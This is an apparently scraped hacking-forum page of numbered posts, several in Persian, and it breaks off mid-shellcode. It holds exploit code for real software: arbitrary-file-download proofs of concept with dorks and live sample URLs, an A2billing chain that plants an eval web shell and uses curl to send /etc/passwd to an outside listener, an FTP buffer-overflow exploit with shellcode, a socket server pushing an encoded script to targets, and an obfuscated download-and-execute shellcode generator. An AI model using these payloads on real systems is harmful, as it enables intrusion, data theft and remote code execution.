"\x61\x61\x28\x61\x32\x29\x20\x20\x0d\x0a\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x30\x29". "\x3d\x30\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x61\x61\x28\x61\x31\x29\x3d\x61\x64\x64\x2b\x34\x20". "\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3d\x31\x2e\x36\x39\x37\x35\x39\x36". "\x36\x33\x33\x31\x36\x37\x34\x37\x45\x2d\x33\x31\x33\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20". "\x20\x20\x72\x75\x6d\x3d\x6c\x65\x6e\x62\x28\x61\x61\x28\x61\x31\x29\x29\x20\x20\x0d\x0a\x20\x20". "\x20\x20\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3d\x30\x0d\x0a\x20\x20\x20\x20\x72\x65\x64". "\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x0d\x0a\x65\x6e\x64". "\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e\x0d". "\x0a\x20\x0d\x0a\x3c\x2f\x62\x6f\x64\x79\x3e\x0d\x0a\x3c\x2f\x68\x74\x6d\x6c\x3e"; $msgd=$msg; $msgd=str_replace("FILE_DOWNLOAD",$link,$msgd); for (;;) { if ($client = @socket_accept($reza)) { socket_write($client, "HTTP/1.1 200 OK\r\n" . "Content-length: " . strlen($msgd) . "\r\n" . "Content-Type: text/html; charset=UTF-8\r\n\r\n" . $msgd); print "\n Target Checked Your Link \n"; } else usleep(100000); } ?>
  2. ############################################ # Title : TI Online Examination System v2 - Arbitrary File Download # Author :Rednofozi # category : webapps # Tested On : Kali Linux # my team:https://anonysec.org # me : Rednofozi@yahoo.com # Vendor HomePage :https://codecanyon.net/item/ti-online-examination-system-v2/11248904 # Google Dork: inurl:N/A # Description : The "Export" operation in the admin panel is vulnerable. The attacker can download and read all files known by the name via "download.php" ############################################ # search google Dork : N/A ####################Proof of Concept ############# Demo : server/admin/ # Vuln file : /admin/download.php 115. $data_action = $_REQUEST['action']; 116. if($data_action == 'downloadfile') 117. { 118. $file = $_REQUEST['file']; 119. $name = $file; 120. $result = output_file($file, $name); # PoC : http://server/admin/download.php?action=downloadfile&file=[filename] you can write the known file name instead of [filename]. For Example: 'download.php' or 'index.php' ###################### # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/1987
  3. Rednofozi

    Hacking-Bugs

    اگر واسه دانلود فایلی توی گوگل سرچی کرده باشید متوجه میشید که بعضی از سایت ها از صفحه ای واسه دانلود کردن فایل به وسیله کاربر استفاده میکنند به طور مثال http://anonysec.org/download.php?file=hacking.pdf از ادرس بالا به شما اجازه دانلود فایل hacking.pdf رو میده از اونجایی که توی بیشتر موارد ورودی ها چک نمیشه و کاربر میتونه هر فایلی رو که بخواد دانلود کنه موجب هک شدن سایت میشه. خوب چطور؟ وقتی که ورودی ها کنترل نشن و کاربر اجازه دانلود هر فایلی رو داشته باشه میتونه فایل های مهم از جمله کانفیگ وب سایت رو دانلود کنه و به صورت Remote به دیتابیس دسترسی پیدا کنه و با عوض کردن پسورد مدیر سایت از توی دیتابیس اقدام به هک کردن و تغییر چهره وب سایت کنه. hairline.it hairline.it منبع anonysec
  4. # Exploit Title: UWordpress dreamsmiths Themes Arbitrary File Download # Google Dork: inurl:/wp-content/themes/fiestaresidences/ inurl:wp-content/themes/hsv/ inurl:wp-content/themes/erinvale/ # Date: 2018/01/08 # Vendor Homepage: iranhack.com # Software Link: http://www.dreamsmiths.com/ # Version: 0.0.1 # Tested on: 7 , KAli P0c: Arbitrary Download PHP File in all WordPress themes By dreamsmiths : site.com/wp-content/themes/fiestaresidences/download.php?file=../../../index.phpsite.com/wp-content/themes/optimus/download.php?file=../../../index.phpsite.com/wp-content/themes/erinvale/download.php?file=../../../index.phpsite.com/wp-content/themes/hsv/download.php?file=../../../index.php Sample: https://fiestaresidences.com/wp-content/themes/fiestaresidences/download.php?file=download.php https://erinvale.co.za/wp-content/themes/erinvale/download.php?file=download.php https://hsvhospitality.com/wp-content/themes/hsv/download.php?file=download.php http://www.optimusproperty.net/wp-content/themes/optimus/download.php?file=download.php
  5. ابزاری همانند Internet Download Manager ویندوز هست که برای لینوکس ارائه شده کافیه وارد روت اصلی و دستورات زیر رو به ترتیب وارد کنید. mkdir xdman cd xdman wget -c http://sourceforge.net/projects/xdman/files/xdman.zip/download unzip download chmod +x xdman برای اجرا کافیه دستور زیر رو وارد کنید xdman./ manba:anonysec
  6. Moeein Seven

    Soft-Android

    نرم افزار Video Download for Whatsapp Video Download for Whatsapp - Apps on Google Play
  7. mohammad_ghazei

    Hacking

    # # # # # # Exploit Title: WYSIWYG HTML Editor PRO 1.0 - Arbitrary File Download # Dork: N/A # Date: 28.08.2017 # Vendor Homepage: http://nelliwinne.net/ # Software Link: https://codecanyon.net/item/wysiwyg-html-editor-pro-php-based-editor-with-image-uploader-and-more/19012022 # Demo: http://codecanyon.nelliwinne.net/WYSIWYGEditorPRO/ # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The security obligation allows an attacker to arbitrary download files.. # # Vulnerable Source: # # ............. # <?php # $file = base64_decode($_GET['id']); # # if (file_exists($file)) { # header('Content-Description: File Transfer'); # header('Content-Type: application/octet-stream'); # header('Content-Disposition: attachment; filename="'.basename($file).'"'); # header('Expires: 0'); # header('Cache-Control: must-revalidate'); # header('Pragma: public'); # header('Content-Length: ' . filesize($file)); # readfile($file); # exit; # } # ?> # ............. # Proof of Concept: # # http://localhost/[PATH]/wysiwyg/download.php?id=[FILENAME_to_BASE64] # # Etc... # # # # #
  8. Anonyali

    Hacking

    # # # # # # Exploit Title: WYSIWYG HTML Editor PRO 1.0 - Arbitrary File Download # Dork: N/A # Date: 28.08.2017 # Vendor Homepage: http://nelliwinne.net/ # Software Link: https://codecanyon.net/item/wysiwyg-html-editor-pro-php-based-editor-with-image-uploader-and-more/19012022 # Demo: http://codecanyon.nelliwinne.net/WYSIWYGEditorPRO/ # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The security obligation allows an attacker to arbitrary download files.. # # Vulnerable Source: # # ............. # <?php # $file = base64_decode($_GET['id']); # # if (file_exists($file)) { # header('Content-Description: File Transfer'); # header('Content-Type: application/octet-stream'); # header('Content-Disposition: attachment; filename="'.basename($file).'"'); # header('Expires: 0'); # header('Cache-Control: must-revalidate'); # header('Pragma: public'); # header('Content-Length: ' . filesize($file)); # readfile($file); # exit; # } # ?> # ............. # Proof of Concept: # # http://localhost/[PATH]/wysiwyg/download.php?id=[FILENAME_to_BASE64] # # Etc... # # # # #
  9. # # # # # # Exploit Title: Joomla! Component Joomanager 2.0.0 - Arbitrary File Download # Dork: N/A # Date: 30.08.2017 # Vendor Homepage: http://www.joomanager.com/ # Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/joomanager/ # Demo: http://www.joomanager.com/demo/realestate # Version: 2.0.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The security obligation allows an attacker to arbitrary download files.. # # Proof of Concept: # # http://localhost/[PATH]/index.php?option=com_joomanager&controller=details&task=download&path=[FILE] # # Etc.. # # # # #
  10. # Title : A2billing 2.x , Unauthenticated Backup dump / RCE flaw # Vulnerable software : A2billing 2.x # Author : Ahmed Sultan (0x4148) # Email : 0x4148@gmail.com # Home : 0x4148.com # Linkedin : https://www.linkedin.com/in/0x4148/ A2billing contain multiple flaws which can be chained together to achieve shell access over the a2b instance If you're looking for deep technical stuff , check out the full writeup at https://0x4148.com/2016/10/28/a2billing-rce/ 1 . backup dump Vulnerable code File : admin/public/form_data/FG_var_backup.inc getpost_ifset(array('name','path','creationdate')); $HD_Form = new FormHandler("cc_backup","Backup"); $HD_Form -> FG_DEBUG = 0; if ($form_action!='ask-add') check_demo_mode(); if ($form_action == 'add'){ $backup_file = $path; if (substr($backup_file,-3)=='.gz'){ // WE NEED TO GZIP $backup_file = substr($backup_file,0,-3); $do_gzip=1; } // Make the backup stuff here and redirect to success page //mysqldump -all --databases mya2billing -ua2billinguser -pa2billing > /tmp/test.sql //pg_dump -c -d -U a2billinguser -h localhost -f /tmp/test.sql mya2billing if (DB_TYPE != 'postgres'){ $run_backup=MYSQLDUMP." -all --databases ".DBNAME." -u'".USER."' -p'".PASS."' > '{$backup_file}'"; }else{ $env_var="PGPASSWORD='".PASS."'"; putenv($env_var); $run_backup=PG_DUMP." -c -d -U ".USER." -h ".HOST." -f '{$backup_file}' ".DBNAME; } if ($FG_DEBUG == 1 ) echo $run_backup."<br>"; >>>> exec($run_backup,$output,$error); if ($do_gzip){ // Compress file $run_gzip = GZIP_EXE." '$backup_file'"; if ($FG_DEBUG == 1 ) echo $run_gzip."<br>"; >>>> exec($run_gzip,$output,$error_zip); } File is being called at "admin/Public/A2B_entity_backup.php" before the authentication checking proccess take place so to dump full backup we can just move to : http://HOST//a2billing/admin/Public/A2B_entity_backup.php?form_action=add&path=0x4148.sql backup will be found at admin/Public/0x4148.sql few hardening is being carried out by the application which did great job preventing direct RCE flaw , so we had to figure out sth else 2 . SQL injection File name : ckeckout_process.php Line 287 : $Query = "INSERT INTO cc_payments_agent ( agent_id, agent_name, agent_email_address, item_name, item_id, item_quantity, payment_method, cc_type, cc_owner, cc_number, " . " cc_expires, orders_status, last_modified, date_purchased, orders_date_finished, orders_amount, currency, currency_value) values (" . " '".$transaction_data[0][1]."', '".$customer_info[3]." ".$customer_info[2]."', '".$customer_info["email"]."', 'balance', '". $customer_info[0]."', 1, '$pmodule', '".$_SESSION["p_cardtype"]."', '".$transaction_data[0][5]."', '".$transaction_data[0][6]."', '". $transaction_data[0][7]."', $orderStatus, '".$nowDate."', '".$nowDate."', '".$nowDate."', ".$amount_paid.", '".$currCurrency."', '". $currencyObject->get_value($currCurrency)."' )"; $result = $DBHandle_max -> Execute($Query); By exploiting this flaw we can insert malicious data into the db using the following query <thanks to i-Hmx for the great hint> transactionID=456789111111 unise//**lecton selinse//**rtect 1,2,3,4,0x706c75676e706179,0x3c3f706870206576616c286261736536345f6465636f646528245f504f53545b6e61696c69745d29293b203f3e,7,8,9,10,11,12,13-//**- -&sess_id=4148&key=98346a2b29c131c78dc89b50894176eb After sending this request the following payload "<?php eval(base64_decode($_POST[nailit])); ?>" will be injected directly into the DB 3 . RCE after injecting the malicious code we can just dump backup again but this time we will name it "0x4148.php" , so our code can be executed :) [root@localhost Public]# curl ' https://127.0.0.1/a2billing/admin/Public/A2B_entity_backup.php?form_action=add&path=0x4148.php' --insecure [root@localhost Public]# cat 0x4148.php | grep nailit INSERT INTO `cc_payments_agent` VALUES (295,2,' ','','balance','',1,'plugnpay','','66666666666666666666666666666666666666666666','77777777777777777777777777777777','8',-1,'3.000000','2016-10-28 10:57:10','2016-10-28 10:57:10','2016-10-28 10:57:10','usd','0.000000'),(296,2,' ','','balance','',1,'plugnpay','','<?php eval(base64_decode($_POST[nailit])); ?>','7','8',-1,'3.000000','2016-10-28 10:58:22','2016-10-28 10:58:22','2016-10-28 10:58:22','usd','0.000000'); Now just exploit it via post nailit=base64_encoded php code to admin/Public/0x4148.php for instance system(‘x=$(cat /etc/passwd);curl -d “$x” http://x.x.x.x:8000/0x4148.jnk’); will read /etc/passwd and send it to our nc listener Exploit timeline : 01/10/2016 : vulnerability reported to vendor 06/10/2016 - 12/2016 : talks talks talks with promises of fixing ASAP 04/09/2017 : Public release Credits, Ahmed Sultan - Cyber Security Analyst @ EG-CERT
  11. #!/usr/bin/python # # Exploit Title: IDA 6.10.1.1527 FTP SEH Universal exploit. # Exploit Author: Fady Mohamed Osman (@fady_osman) # Exploit-db : http://www.exploit-db.com/author/?a=2986 # Youtube : https://www.youtube.com/user/cutehack3r # Date: Jan 2, 2017 # Vendor Homepage: http://westbyte.com/ # Software Link: http://westbyte.com/index.phtml?page=support&tmp=1&lng=English&product=Internet%20Download%20Accelerator. # Version: 6.10.1.1527 # Tested on: IDA 6.10.1.1527 Free Version - Windows 7 SP1 - Windows 10. # -------------- # Internet download accelerator suffers from a BOF when an FTP Download of file with # long name fails. # -------------- # To Exploit this issue: # 1- Run HTTP server that will redirect to the FTP file with long name. # 2- The ftp server will answer to the commands sent then will open a data connection. # 3- The script will send an empty file list and close the connection to trigger the BOF condition. # 5- Happy new year :D. import SocketServer import threading # IP to listen to, needed to construct PASV response so 0.0.0.0 is not gonna work. ip = "192.168.1.100" ipParts = ip.split(".") PasvResp = "("+ ipParts[0]+ "," + ipParts[1]+ "," + ipParts[2] + "," + ipParts[3] + ",151,130)" # Run Calc.exe buf=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B" "\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B" "\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31" "\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA" "\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14" "\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65" "\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC") class HTTPHandler(SocketServer.BaseRequestHandler): """ The request handler class for our HTTP server. This is just so we don't have to provide a suspicious FTP link with long name. """ def handle(self): # self.request is the TCP socket connected to the client self.data = self.request.recv(1024).strip() print "[*] Recieved HTTP Request" print "[*] Sending Redirction To FTP" # just send back the same data, but upper-cased # SEH Offset 336 - 1056 bytes for the payload - 0x10011b53 unzip32.dll ppr 0x0c payload = "ftp://192.168.1.100/"+ 'A' * 336 + "\xeb\x06\x90\x90" + "\x53\x1b\x01\x10" + buf + "B" * (1056 - len(buf)) self.request.sendall("HTTP/1.1 302 Found\r\n" + "Host: Server\r\nConnection: close\r\nLocation: "+ payload+ "\r\nContent-type: text/html; charset=UTF-8\r\n\r\n") print "[*] Redirection Sent..." class FTPHandler(SocketServer.BaseRequestHandler): """ The request handler class for our FTP server. This will work normally and open a data connection with IDA. """ def handle(self): # User Command self.request.sendall("220 Nasty FTP Server Ready\r\n") User = self.request.recv(1024).strip() print "[*] Recieved User Command: " + User self.request.sendall("331 User name okay, need password\r\n") # PASS Command Pass = self.request.recv(1024).strip() print "[*] Recieved PASS Command: " + Pass self.request.sendall("230-Password accepted.\r\n230 User logged in.\r\n") # SYST Command Syst = self.request.recv(1024).strip() print "[*] Recieved SYST Command: " + Syst self.request.sendall("215 UNIX Type: L8\r\n") # TYPE Command Type = self.request.recv(1024).strip() print "[*] Recieved Type Command: " + Type self.request.sendall("200 Type set to I\r\n") # REST command Rest = self.request.recv(1024).strip() print "[*] Recieved Rest Command: " + Rest self.request.sendall("200 OK\r\n") # CWD command Cwd = self.request.recv(2048).strip() print "[*] Recieved CWD Command: " + Cwd self.request.sendall("250 CWD Command successful\r\n") # PASV command. Pasv = self.request.recv(1024).strip() print "[*] Recieved PASV Command: " + Pasv self.request.sendall("227 Entering Passive Mode " + PasvResp + "\r\n") #LIST List = self.request.recv(1024).strip() print "[*] Recieved LIST Command: " + List self.request.sendall("150 Here comes the directory listing.\r\n226 Directory send ok.\r\n") class FTPDataHandler(SocketServer.BaseRequestHandler): """ The request handler class for our FTP Data connection. This will send useless response and close the connection to trigger the error. """ def handle(self): # self.request is the TCP socket connected to the client print "[*] Recieved FTP-Data Request" print "[*] Sending Empty List" # just send back the same data, but upper-cased self.request.sendall("total 0\r\n\r\n") self.request.close() if __name__ == "__main__": HOST, PORT = ip, 8000 SocketServer.TCPServer.allow_reuse_address = True print "[*] Starting the HTTP Server." # Create the server, binding to localhost on port 8000 HTTPServer = SocketServer.TCPServer((HOST, PORT), HTTPHandler) # Running the http server (using a thread so we can continue and listen for FTP and FTP-Data). HTTPThread = threading.Thread(target=HTTPServer.serve_forever) HTTPThread.daemon = True HTTPThread.start() print "[*] Starting the FTP Server." # Running the FTP server. FTPServer = SocketServer.TCPServer((HOST, 21), FTPHandler) # Running the FTP server thread. FTPThread = threading.Thread(target=FTPServer.serve_forever) FTPThread.daemon = True FTPThread.start() print "[*] Opening the data connection." # Opening the FTP data connection - DON'T CHANGE THE PORT. FTPData = SocketServer.TCPServer((HOST, 38786), FTPHandler) # Running the FTP Data connection Thread. DataThread = threading.Thread(target=FTPData.serve_forever) DataThread.daemon = True DataThread.start() print "[*] Listening for FTP Data." # Making the main thread wait. print "[*] To exit the script please press any key at any time." raw_input()
  12. Moeein Seven

    Hacking

    #Title: Obfuscated Shellcode Windows x86/x64 Download And Execute [Use PowerShell] - Generator #length: Dynamic ! depend on url and filename #Date: 20 January 2015 #Author: Ali Razmjoo #tested On: Windows 7 x64 ultimate #WinExec => 0x77b1e695 #ExitProcess => 0x77ae2acf #==================================== #Execute : #powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://tartarus.org/~simon/putty-prerel-snapshots/x86/putty.exe', 'D:\Ali.exe')};D:\Ali.exe" #==================================== #Ali Razmjoo , ['Ali.Razmjoo1994@Gmail.Com','Ali@Z3r0D4y.Com'] #Thanks to my friends , Dariush Nasirpour and Ehsan Nezami #################################################### #How it work ? ''' C:\Users\Ali\Desktop>python "Windows x86 Download And Execute.py" Enter url Example: http://z3r0d4y.com/file.exe Enter:http://tartarus.org/~simon/putty-prerel-snapshots/x86/putty.exe Enter filename Example: D:\file.exe Enter:C:\Ali.exe C:\Users\Ali\Desktop>nasm -f elf shellcode.asm -o shellcode.o C:\Users\Ali\Desktop>objdump -D shellcode.o shellcode.o: file format elf32-i386 Disassembly of section .text: 00000000 <.text>: 0: 31 c0 xor %eax,%eax 2: 50 push %eax 3: 68 41 41 65 22 push $0x22654141 8: 58 pop %eax 9: c1 e8 08 shr $0x8,%eax c: c1 e8 08 shr $0x8,%eax f: 50 push %eax 10: b8 34 47 0b 4d mov $0x4d0b4734,%eax 15: bb 5d 69 6e 35 mov $0x356e695d,%ebx 1a: 31 d8 xor %ebx,%eax 1c: 50 push %eax 1d: b8 43 32 10 22 mov $0x22103243,%eax 22: bb 79 6e 51 4e mov $0x4e516e79,%ebx 27: 31 d8 xor %ebx,%eax 29: 50 push %eax 2a: b8 60 05 42 32 mov $0x32420560,%eax 2f: bb 49 78 79 71 mov $0x71797849,%ebx 34: 31 d8 xor %ebx,%eax 36: 50 push %eax 37: b8 0f 1c 2c 14 mov $0x142c1c0f,%eax 3c: bb 6a 64 49 33 mov $0x3349646a,%ebx 41: 31 d8 xor %ebx,%eax 43: 50 push %eax 44: b8 07 3e 0b 40 mov $0x400b3e07,%eax 49: bb 46 52 62 6e mov $0x6e625246,%ebx 4e: 31 d8 xor %ebx,%eax 50: 50 push %eax 51: b8 44 0a 78 07 mov $0x7780a44,%eax 56: bb 63 49 42 5b mov $0x5b424963,%ebx 5b: 31 d8 xor %ebx,%eax 5d: 50 push %eax 5e: b8 0f 16 4b 0d mov $0xd4b160f,%eax 63: bb 6a 31 67 2d mov $0x2d67316a,%ebx 68: 31 d8 xor %ebx,%eax 6a: 50 push %eax 6b: b8 18 62 5c 1f mov $0x1f5c6218,%eax 70: bb 61 4c 39 67 mov $0x67394c61,%ebx 75: 31 d8 xor %ebx,%eax 77: 50 push %eax 78: b8 1b 2d 1e 1f mov $0x1f1e2d1b,%eax 7d: bb 6b 58 6a 6b mov $0x6b6a586b,%ebx 82: 31 d8 xor %ebx,%eax 84: 50 push %eax 85: b8 45 40 41 66 mov $0x66414045,%eax 8a: bb 3d 78 77 49 mov $0x4977783d,%ebx 8f: 31 d8 xor %ebx,%eax 91: 50 push %eax 92: b8 02 1f 4b 45 mov $0x454b1f02,%eax 97: bb 6d 6b 38 6a mov $0x6a386b6d,%ebx 9c: 31 d8 xor %ebx,%eax 9e: 50 push %eax 9f: b8 24 3e 19 32 mov $0x32193e24,%eax a4: bb 45 4e 6a 5a mov $0x5a6a4e45,%ebx a9: 31 d8 xor %ebx,%eax ab: 50 push %eax ac: b8 00 5e 3a 35 mov $0x353a5e00,%eax b1: bb 6c 73 49 5b mov $0x5b49736c,%ebx b6: 31 d8 xor %ebx,%eax b8: 50 push %eax b9: b8 1f 37 40 24 mov $0x2440371f,%eax be: bb 6d 52 32 41 mov $0x4132526d,%ebx c3: 31 d8 xor %ebx,%eax c5: 50 push %eax c6: b8 2e 35 68 31 mov $0x3168352e,%eax cb: bb 5a 4c 45 41 mov $0x41454c5a,%ebx d0: 31 d8 xor %ebx,%eax d2: 50 push %eax d3: b8 48 1e 1c 15 mov $0x151c1e48,%eax d8: bb 67 6e 69 61 mov $0x61696e67,%ebx dd: 31 d8 xor %ebx,%eax df: 50 push %eax e0: b8 26 28 0d 5d mov $0x5d0d2826,%eax e5: bb 4f 45 62 33 mov $0x3362454f,%ebx ea: 31 d8 xor %ebx,%eax ec: 50 push %eax ed: b8 20 57 1d 45 mov $0x451d5720,%eax f2: bb 47 78 63 36 mov $0x36637847,%ebx f7: 31 d8 xor %ebx,%eax f9: 50 push %eax fa: b8 04 6a 24 3b mov $0x3b246a04,%eax ff: bb 77 44 4b 49 mov $0x494b4477,%ebx 104: 31 d8 xor %ebx,%eax 106: 50 push %eax 107: b8 18 0f 0a 32 mov $0x320a0f18,%eax 10c: bb 6c 6e 78 47 mov $0x47786e6c,%ebx 111: 31 d8 xor %ebx,%eax 113: 50 push %eax 114: b8 7d 18 3c 27 mov $0x273c187d,%eax 119: bb 52 6c 5d 55 mov $0x555d6c52,%ebx 11e: 31 d8 xor %ebx,%eax 120: 50 push %eax 121: b8 03 44 60 60 mov $0x60604403,%eax 126: bb 77 34 5a 4f mov $0x4f5a3477,%ebx 12b: 31 d8 xor %ebx,%eax 12d: 50 push %eax 12e: b8 47 6b 1f 20 mov $0x201f6b47,%eax 133: bb 6f 4c 77 54 mov $0x54774c6f,%ebx 138: 31 d8 xor %ebx,%eax 13a: 50 push %eax 13b: b8 2a 5e 2b 20 mov $0x202b5e2a,%eax 140: bb 6c 37 47 45 mov $0x4547376c,%ebx 145: 31 d8 xor %ebx,%eax 147: 50 push %eax 148: b8 59 07 12 0e mov $0xe120759,%eax 14d: bb 35 68 73 6a mov $0x6a736835,%ebx 152: 31 d8 xor %ebx,%eax 154: 50 push %eax 155: b8 01 59 11 2c mov $0x2c115901,%eax 15a: bb 45 36 66 42 mov $0x42663645,%ebx 15f: 31 d8 xor %ebx,%eax 161: 50 push %eax 162: b8 22 22 4e 5a mov $0x5a4e2222,%eax 167: bb 4c 56 67 74 mov $0x7467564c,%ebx 16c: 31 d8 xor %ebx,%eax 16e: 50 push %eax 16f: b8 00 37 1b 48 mov $0x481b3700,%eax 174: bb 43 5b 72 2d mov $0x2d725b43,%ebx 179: 31 d8 xor %ebx,%eax 17b: 50 push %eax 17c: b8 4a 1f 22 13 mov $0x13221f4a,%eax 181: bb 64 48 47 71 mov $0x71474864,%ebx 186: 31 d8 xor %ebx,%eax 188: 50 push %eax 189: b8 6a 23 03 18 mov $0x1803236a,%eax 18e: bb 4a 6d 66 6c mov $0x6c666d4a,%ebx 193: 31 d8 xor %ebx,%eax 195: 50 push %eax 196: b8 2d 54 57 1c mov $0x1c57542d,%eax 19b: bb 47 31 34 68 mov $0x68343147,%ebx 1a0: 31 d8 xor %ebx,%eax 1a2: 50 push %eax 1a3: b8 4e 15 36 5a mov $0x5a36154e,%eax 1a8: bb 39 38 79 38 mov $0x38793839,%ebx 1ad: 31 d8 xor %ebx,%eax 1af: 50 push %eax 1b0: b8 59 7f 1f 04 mov $0x41f7f59,%eax 1b5: bb 79 57 51 61 mov $0x61515779,%ebx 1ba: 31 d8 xor %ebx,%eax 1bc: 50 push %eax 1bd: b8 47 56 1d 2f mov $0x2f1d5647,%eax 1c2: bb 65 70 3d 54 mov $0x543d7065,%ebx 1c7: 31 d8 xor %ebx,%eax 1c9: 50 push %eax 1ca: b8 2c 18 08 54 mov $0x5408182c,%eax 1cf: bb 4d 76 6c 74 mov $0x746c764d,%ebx 1d4: 31 d8 xor %ebx,%eax 1d6: 50 push %eax 1d7: b8 5a 34 58 1b mov $0x1b58345a,%eax 1dc: bb 39 5b 35 76 mov $0x76355b39,%ebx 1e1: 31 d8 xor %ebx,%eax 1e3: 50 push %eax 1e4: b8 3f 0f 4b 41 mov $0x414b0f3f,%eax 1e9: bb 53 63 6b 6c mov $0x6c6b6353,%ebx 1ee: 31 d8 xor %ebx,%eax 1f0: 50 push %eax 1f1: b8 4a 1e 59 0b mov $0xb591e4a,%eax 1f6: bb 38 6d 31 6e mov $0x6e316d38,%ebx 1fb: 31 d8 xor %ebx,%eax 1fd: 50 push %eax 1fe: b8 49 2b 16 2a mov $0x2a162b49,%eax 203: bb 39 44 61 4f mov $0x4f614439,%ebx 208: 31 d8 xor %ebx,%eax 20a: 50 push %eax 20b: 89 e0 mov %esp,%eax 20d: bb 41 41 41 01 mov $0x1414141,%ebx 212: c1 eb 08 shr $0x8,%ebx 215: c1 eb 08 shr $0x8,%ebx 218: c1 eb 08 shr $0x8,%ebx 21b: 53 push %ebx 21c: 50 push %eax 21d: bb 95 e6 b1 77 mov $0x77b1e695,%ebx 222: ff d3 call *%ebx 224: bb cf 2a ae 77 mov $0x77ae2acf,%ebx 229: ff d3 call *%ebx C:\Users\Ali\Desktop> #you have your shellcode now ======================================= shellcode.c #include <stdio.h> #include <string.h> int main(){ unsigned char shellcode[]= "\x31\xc0\x50\x68\x41\x41\x65\x22\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb8\x34\x47\x0b\x4d\xbb\x5d\x69\x6e\x35\x31\xd8\x50\xb8\x43\x32\x10\x22\xbb\x79\x6e\x51\x4e\x31\xd8\x50\xb8\x60\x05\x42\x32\xbb\x49\x78\x79\x71\x31\xd8\x50\xb8\x0f\x1c\x2c\x14\xbb\x6a\x64\x49\x33\x31\xd8\x50\xb8\x07\x3e\x0b\x40\xbb\x46\x52\x62\x6e\x31\xd8\x50\xb8\x44\x0a\x78\x07\xbb\x63\x49\x42\x5b\x31\xd8\x50\xb8\x0f\x16\x4b\x0d\xbb\x6a\x31\x67\x2d\x31\xd8\x50\xb8\x18\x62\x5c\x1f\xbb\x61\x4c\x39\x67\x31\xd8\x50\xb8\x1b\x2d\x1e\x1f\xbb\x6b\x58\x6a\x6b\x31\xd8\x50\xb8\x45\x40\x41\x66\xbb\x3d\x78\x77\x49\x31\xd8\x50\xb8\x02\x1f\x4b\x45\xbb\x6d\x6b\x38\x6a\x31\xd8\x50\xb8\x24\x3e\x19\x32\xbb\x45\x4e\x6a\x5a\x31\xd8\x50\xb8\x00\x5e\x3a\x35\xbb\x6c\x73\x49\x5b\x31\xd8\x50\xb8\x1f\x37\x40\x24\xbb\x6d\x52\x32\x41\x31\xd8\x50\xb8\x2e\x35\x68\x31\xbb\x5a\x4c\x45\x41\x31\xd8\x50\xb8\x48\x1e\x1c\x15\xbb\x67\x6e\x69\x61\x31\xd8\x50\xb8\x26\x28\x0d\x5d\xbb\x4f\x45\x62\x33\x31\xd8\x50\xb8\x20\x57\x1d\x45\xbb\x47\x78\x63\x36\x31\xd8\x50\xb8\x04\x6a\x24\x3b\xbb\x77\x44\x4b\x49\x31\xd8\x50\xb8\x18\x0f\x0a\x32\xbb\x6c\x6e\x78\x47\x31\xd8\x50\xb8\x7d\x18\x3c\x27\xbb\x52\x6c\x5d\x55\x31\xd8\x50\xb8\x03\x44\x60\x60\xbb\x77\x34\x5a\x4f\x31\xd8\x50\xb8\x47\x6b\x1f\x20\xbb\x6f\x4c\x77\x54\x31\xd8\x50\xb8\x2a\x5e\x2b\x20\xbb\x6c\x37\x47\x45\x31\xd8\x50\xb8\x59\x07\x12\x0e\xbb\x35\x68\x73\x6a\x31\xd8\x50\xb8\x01\x59\x11\x2c\xbb\x45\x36\x66\x42\x31\xd8\x50\xb8\x22\x22\x4e\x5a\xbb\x4c\x56\x67\x74\x31\xd8\x50\xb8\x00\x37\x1b\x48\xbb\x43\x5b\x72\x2d\x31\xd8\x50\xb8\x4a\x1f\x22\x13\xbb\x64\x48\x47\x71\x31\xd8\x50\xb8\x6a\x23\x03\x18\xbb\x4a\x6d\x66\x6c\x31\xd8\x50\xb8\x2d\x54\x57\x1c\xbb\x47\x31\x34\x68\x31\xd8\x50\xb8\x4e\x15\x36\x5a\xbb\x39\x38\x79\x38\x31\xd8\x50\xb8\x59\x7f\x1f\x04\xbb\x79\x57\x51\x61\x31\xd8\x50\xb8\x47\x56\x1d\x2f\xbb\x65\x70\x3d\x54\x31\xd8\x50\xb8\x2c\x18\x08\x54\xbb\x4d\x76\x6c\x74\x31\xd8\x50\xb8\x5a\x34\x58\x1b\xbb\x39\x5b\x35\x76\x31\xd8\x50\xb8\x3f\x0f\x4b\x41\xbb\x53\x63\x6b\x6c\x31\xd8\x50\xb8\x4a\x1e\x59\x0b\xbb\x38\x6d\x31\x6e\x31\xd8\x50\xb8\x49\x2b\x16\x2a\xbb\x39\